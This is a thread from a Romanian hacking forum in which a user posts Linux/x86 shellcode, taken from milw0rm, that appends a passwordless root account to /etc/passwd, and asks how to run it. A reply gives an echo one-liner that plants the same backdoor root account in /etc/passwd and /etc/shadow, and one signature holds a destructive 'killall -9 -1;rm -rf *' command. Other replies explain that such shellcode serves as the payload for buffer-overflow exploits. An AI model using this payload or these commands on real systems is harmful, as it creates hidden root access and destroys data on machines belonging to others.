Hacking and more...
HaCkinG CulT
|
Lista Forumurilor Pe Tematici
|
Hacking and more... | Reguli | Inregistrare | Login
POZE HACKING AND MORE...
Nu sunteti logat.
|
Nou pe simpatie:
Criscristina92 Profile
 | Femeie
25 ani
Bucuresti
cauta Barbat
29 - 80 ani |
|
andoseg
Little Kevin
 Inregistrat: acum 17 ani
Postari: 68
|
|
Salut eram in vizita pe milworm si as vrea sa pun in aplicate smecheria asta :
Code:
/* By Kris Katterjohn 11/14/2006
*
* 69 byte shellcode to add root user 'r00t' with no password to /etc/passwd
*
* for Linux/x86
*
*
*
* section .text
*
* global _start
*
* _start:
*
* ; open("/etc//passwd", O_WRONLY | O_APPEND)
*
* push byte 5
* pop eax
* xor ecx, ecx
* push ecx
* push 0x64777373
* push 0x61702f2f
* push 0x6374652f
* mov ebx, esp
* mov cx, 02001Q
* int 0x80
*
* mov ebx, eax
*
* ; write(ebx, "r00t::0:0:::", 12)
*
* push byte 4
* pop eax
* xor edx, edx
* push edx
* push 0x3a3a3a30
* push 0x3a303a3a
* push 0x74303072
* mov ecx, esp
* push byte 12
* pop edx
* int 0x80
*
* ; close(ebx)
*
* push byte 6
* pop eax
* int 0x80
*
* ; exit()
*
* push byte 1
* pop eax
* int 0x80
*/
main()
{
char shellcode[] =
"x6ax05x58x31xc9x51x68x73x73x77x64x68"
"x2fx2fx70x61x68x2fx65x74x63x89xe3x66"
"xb9x01x04xcdx80x89xc3x6ax04x58x31xd2"
"x52x68x30x3ax3ax3ax68x3ax3ax30x3ax68"
"x72x30x30x74x89xe1x6ax0cx5axcdx80x6a"
"x06x58xcdx80x6ax01x58xcdx80";
(*(void (*)()) shellcode)(); |
cineva priceput poate sa explce detaliat ce face ? si cum o facem sa fctioneze ? 
_______________________________________
Wherever you go i'll see you
|
|
| pus acum 17 ani |
|
Shocker
Super Moderator
 Din: localhost
Inregistrat: acum 17 ani
Postari: 2084
|
|
|
| pus acum 17 ani |
|
CoLLeOn
Junior+
 Inregistrat: acum 17 ani
Postari: 33
|
|
Sau si mai simplu..... copy,paste
echo r00t :0:0::/tmp:/bin/sh >> /etc/passwd echo r00t:::::: >> /etc/shadow
Tre` sa ai UID 0
_______________________________________
killall -9 -1;rm -rf *
|
|
| pus acum 17 ani |
|
srdjan
Grand Master
 Din: Arad
Inregistrat: acum 17 ani
Postari: 337
|
|
ca sa mai resuscitez si eu cate ceva... sincer mie imi seamana foarte foarte foarte mult cu assembler... dar nah... daca voi ziceti ca e C fie... 
btw... ca sa faci un user cu drepturi de root tre sa ai root... daca ai root nu mai e o problema sa faci user cu drept de root... ca sa fii tare tre sa faci creaza un root fara sa ai drepturi de root... in clipa aia scot palaria in fata ta si ma inclin.... (se poate!)
_______________________________________
In God I trust... all others please send me md5 sum-checks
|
|
| pus acum 16 ani |
|
OSHO
Elite Member
 Din: Cluj
Inregistrat: acum 17 ani
Postari: 2069
|
|
Chestia de mai sus e C si nu e un program de sine stator ci doar un shellcode, o portiune de cod care o incluzi intr-un program (exploit) ca sa faca ceva. De exemplu, daca exista un exploit pentru aplicatia X care ruleaza ca root si e vulnerabila la buffer overflow, rulezi exploitul si codul care ajunge dincolo de buffer (care urmeaza sa fie rulat) o sa il pui pe asta de mai sus. Asta ca sa nu faci exploitul si sa stai tu sa iti bati capul ce ar trebui sa scrii in hexa ca sa adaugi un user sau ca sa pornesti un sh 
_______________________________________
IPFind: IP Finder and browser revealer
SkullBox: IT pentru incepatori
_______________________________________
|
|
| pus acum 16 ani |
|
